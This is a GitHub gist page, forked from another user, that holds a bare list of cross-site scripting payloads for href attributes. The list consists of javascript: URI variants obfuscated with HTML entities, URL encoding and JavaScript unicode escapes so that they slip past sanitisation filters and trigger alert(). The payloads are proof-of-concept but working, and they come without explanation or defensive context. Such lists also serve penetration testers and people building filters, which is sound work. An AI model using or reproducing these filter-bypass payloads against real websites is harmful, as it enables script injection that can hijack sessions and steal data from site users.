Skip to content

Instantly share code, notes, and snippets.

@mrrootsec

mrrootsec/href_bypass.html

Forked from hackerscrolls/href_bypass.html
Created April 10, 2025 06:15
Show Gist options
  • Save mrrootsec/74ae7d619e16e993a2a25eac1a029776 to your computer and use it in GitHub Desktop.
Save mrrootsec/74ae7d619e16e993a2a25eac1a029776 to your computer and use it in GitHub Desktop.
Download ZIP
XSS payloads for href
Raw
href_bypass.html
<!--javascript -->
ja&Tab;vascript:alert(1)
ja&NewLine;vascript:alert(1)
ja&#x0000A;vascript:alert(1)
java&#x73;cript:alert()
<!--::colon:: -->
javascript&colon;alert()
javascript&#x0003A;alert()
javascript&#58;alert(1)
javascript&#x3A;alert()
<!-- alert -->
#HTML entities/encode:
javascript:alert&lpar;&rpar;
javascript:al&#x65;rt``
#url encoding:
javascript:alert%60%60
javascript:x='%27-alert(1)-%27';
javascript:%61%6c%65%72%74%28%29
#JS unicode
javascript:a\u006Cert``"
javascript:\u0061\u006C\u0065\u0072\u0074``
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment